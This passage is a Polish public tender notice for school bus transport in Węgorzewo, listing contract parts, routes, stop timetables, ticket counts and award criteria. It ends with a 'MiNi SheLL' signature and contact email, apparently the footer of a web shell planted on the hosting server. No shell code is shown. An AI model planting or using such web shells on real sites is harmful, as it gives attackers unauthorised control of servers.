Wysiecza I- 14.20 i 15.55; Przystanek 10: Wysiecza II- 14.20 i 15.55; Przystanek 11: Jakunowo - 14.30 i 16.05; Przystanek 12: Stulichy I- 14.35 i 16.10; Przystanek 13: Stulichy II- 14.37 i 16.12; Przystanek 14: Wilkowo I- 14.44 i 16.19; Przystanek 15: Wilkowo II- 14.46 i 16.21; Przystanek 16: Prynowo I-14.53 i 16.28; Przystanek 17: Prynowo II- 14.55 i 16.30; Przystanek 18: Prynowo III- 14.57 i 16.32; Przystanek 19: Maćki I- 14.59 i 16.34; Przystanek 20: Maćki II- 15.00 i 16.35.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>60100000-9, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: 5<br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">nieodpłatne kilometry przewozowe</td><td style="border: 1px solid black;border-collapse: collapse;">20,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">termin płatności faktury</td><td style="border: 1px solid black;border-collapse: collapse;">20,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>Przewozy szkolne uczniów do szkół w gminie Węgorzewo do 30.06.2019 r. </td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część II-trasa 1:dowóz i rozwóz do SP1 w Węgorzewie uczniów dotychczasowego gimnazjum z obwodu SP w Węgielsztynie. 1.Węgielsztyn -Węgorzewo- do 10 km; 2.Dąbrówka Mała - Węgorzewo-do 15 km; 3.Wesołowo - Węgorzewo- do 20 km; 4.Biedaszki - Węgorzewo- do 15 km; 5.Guja - Węgorzewo- do 15 km; 6.Brzozowo - Węgorzewo- do 10 km. 6. Kolonia Różewiec-Węgorzewo - do 15 km. Razem: 12 biletów, w tym 5 do 10 km, 4 do 15 km, 3 do 20 kmDowóz (1 kurs): Przystanek 1: Brzozowo I- 7.03; Przystanek 2: Brzozowo II -7.05; Przystanek 3: Wesołowo I-7.16; Przystanek 4: Wesołowo II-7.18; Przystanek 5: Guja -7.23; Przystanek 6: Guja las -7.25. Przystanek 7: Różewiec- 7.27; Przystanek 8: Węgielsztyn-7.30; Przystanek 9: Węgorzewo ul. Pionierów-7.40. Rozwóz (1 kurs): Przystanek 1: Węgorzewo ul. Pionierów-15.30; Przystanek 2: Węgielsztyn-15.38; Przystanek 3: Kolonia Różewiec- 15.40; Przystanek 4: Guja -15.45; Przystanek 5: Guja las-15.48; Przystanek 6: Wesołowo II -15.56; Przystanek 7: Wesołowo I-16.58; Przystanek 8: Brzozowo II -16.08; Przystanek 9: Brzozowo II-16.10. Trasa 2: dowóz i rozwóz do SP 1 w Węgorzewie i SOSW w Węgorzewie uczniów z obwodu SP w Perłach. 1.Łęgwarowo-Węgorzewo- do 20 km; 2.Rudziszki i zw. Suczki -Węgorzewo- do 15 km; 3.Pasternak -Węgorzewo- do 20 km; 4.Perły-Węgorzewo-do 15 km;5.Klimki -Węgorzewo-do 10 km. Razem: 5w tym 1 bilet do 10 km, 3 bilety do 15 km i 1 bilet do 20 km Harmonogram trasy: (1 kurs): Przystanek 1: Pasternak-7.20; Przystanek 2: Rudziszki I-7.24; Przystanek 3: Rudziszki II-7.26; Przystanek 4: Perły-7.28; Przystanek 5: Klimki I-7.36; Przystanek 6: Klimki II-7.38; Przystanek 7: Węgorzewo ul. Pionierów- 7.45.Rozwóz (1 kurs): Przystanek 1: Węgorzewo-15.30; Przystanek 2: Klimki II-15.38; Przystanek 3: Klimki I-15.40; Przystanek 5: Perły-15.48; Przystanek 6: Rudziszki II-15.50; Przystanek 7: Rudziszki I-15.52; Przystanek 8: Pasternak-15.58; <br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>60100000-9, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: 5<br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">nieodpłatne kilometry przewozowe</td><td style="border: 1px solid black;border-collapse: collapse;">20,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">termin płatności faktury</td><td style="border: 1px solid black;border-collapse: collapse;">20,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>3</td><td><b>Nazwa: </b></td><td>Część II-trasa 1:dowóz i rozwóz do SP1 w Węgorzewie uczniów dotychczasowego gimnazjum z obwodu SP w Węgielsztynie. 1.Węgielsztyn -Węgorzewo- do 10 km; 2.Dąbrówka Mała - Węgorzewo-do 15 km; 3.Wesołowo - Węgorzewo- do 20 km; 4.Biedaszki - Węgorzewo- do 15 km; 5.Guja - Węgorzewo- do 15 km; 6.Brzozowo - Węgorzewo- do 10 km. 6. Kolonia Różewiec-Węgorzewo - do 15 km. Razem: 12 biletów, w tym 5 do 10 km, 4 do 15 km, 3 do 20 km Dowóz (1 kurs): Przystanek 1: Brzozowo I- 7.03; Przystanek 2: Brzozowo I</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część III-dowóz do SP w Węgielsztynie(tylko do szkoły). Trasa: 1.Dąbrówka Mała - Węgielsztyn- do 5 km; 2.Wesołowo - Węgielsztyn- do 10 km; 3.Biedaszki - Węgielsztyn- do 5 km; 4.Guja - Węgielsztyn- do 10 km; 5.Brzozowo - Węgielsztyn- do 10 km. Razem: 52, w tym 18 biletów do 5 km, 34 bilety do 10 km. Harmonogram trasy:: Przystanek 1: Brzozowo I-7.10; Przystanek 2: Brzozowo II-7.12; Przystanek 3: Biedaszki I-7.20; Przystanek 4: Biedaszki II-7.21; Przystanek 5: Wesołowo I-7.23; Przystanek 6: Wesołowo II -7.25; Przystanek 7: Guja Las-7.33; Przystanek 8: Guja -7.35; Przystanek 9: Dąbrówka Mała -7.38; Przystanek 10: Węgielsztyn-7.45.Trasa 2: -rozwóz ze SP w Perłach (tylko ze szkoły do miejsca zamieszkania)- Trasa: 1.Rudziszki -Perły-do 5 km; 2.Pasternak - Perły- do 5 km; 3.Łęgwarowo - Perły- do 10 km; 4.Klimki - Perły- do 10 km; 5.Maćki - Perły- do 10 km. Razem: 58, w tym 29 biletów do 5 km, 29 do 10 km.Harmonogram trasy: Przystanek 1: Perły -14.35; Przystanek 2: Rudziszki -14.37; Przystanek 3: Rudziszki wieś-14.40; Przystanek 4: Pasternak kolonia -14.42; Przystanek 5: Pasternak -14.45; Przystanek 6: Rudziszki kolonia II-14.57; Przystanek 7: Suczki I-14.57; Przystanek 8: Suczki II wieś-14.59; Przystanek 9: Łęgwarowo-15.03; Przystanek 10: Perły-15.18; Wyjazd-15.20; Przystanek 11: Klimki I wieś-15.25; Przystanek 12: Klimki II kolonia-15.26; Przystanek 13: Prynowo kolonia -15.28; Przystanek 14: Prynowo skrzyżowanie -15.29; Przystanek 15: Maćki -15.32; Przystanek 16: Węgorzewo pl. Wolności-15.38.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>60100000-9, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: 5<br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">nieodpłatne kilometry przewozowe</td><td style="border: 1px solid black;border-collapse: collapse;">20,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">termin płatności faktury</td><td style="border: 1px solid black;border-collapse: collapse;">20,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>4</td><td><b>Nazwa: </b></td><td>Przewozy szkolne uczniów do szkół w gminie Węgorzewo do 30.06.2019 r. </td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część IV-A -Dowóz i rozwóz w SP w Radziejach. 1.Pniewo - Radzieje- do 10 km; 2.Sztynort - Radzieje-do 10 km; 3.Sztynort Mały - Radzieje-do 10 km; 4.Kamionek Wielki - Radzieje-do 5 km; 5.Tarławki - Radzieje- do 10 km; 6.Surwile - Radzieje- do 10 km; 7.Pilwa - Radzieje-do 5 km; 8.Kamień - Radzieje-do 10 km; 9. Łabapa -Radzieje-do 10 km. Razem: 48, w tym 10biletów do 5 km, 38 biletów do 10 km. Trasa 1:Dowóz (kurs 1):Przystanek 1: Sztynort-7.10; Przystanek 2: Sztynort Mały-7.15; Przystanek 3: Kamionek Wielki-7.18; Przystanek 4: Łabapa-7.30; Przystanek 5: Pilwa-7.42; Przystanek 6: Radzieje-7.50. Dowóz (kurs 2): Przystanek 1: Pniewo- 7.15; Przystanek 2: Surwile-7.24; Przystanek 3: Kamień Duży-7.26; Przystanek 4: Tarławki- 7.29; Przystanek 5: Kamionek Wielki-7.36; Przystanek 6: Radzieje-7.50. Rozwóz (kurs 1): Przystanek 1: Radzieje -14.25; Przystanek 2: Pilwa-14.33; Przystanek 3: Łabapa-14.45; Przystanek 4: Kamionek Wielki -14.57; Przystanek 5: Sztynort Mały -15.00; Przystanek 6: Sztynort-15.05; Rozwóz (kurs 2): Przystanek 1: Radzieje-14.25; Przystanek 2: Kamionek Wielki-14.34; Przystanek 3: Tarławki-14.39; Przystanek 4: Kamień duży-14.42; Przystanek 5: Surwile-14.44; Przystanek 6: Pniewo-14.55.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>60100000-9, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: 5<br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">nieodpłatne kilometry przewozowe</td><td style="border: 1px solid black;border-collapse: collapse;">20,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">termin płatności faktury</td><td style="border: 1px solid black;border-collapse: collapse;">20,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com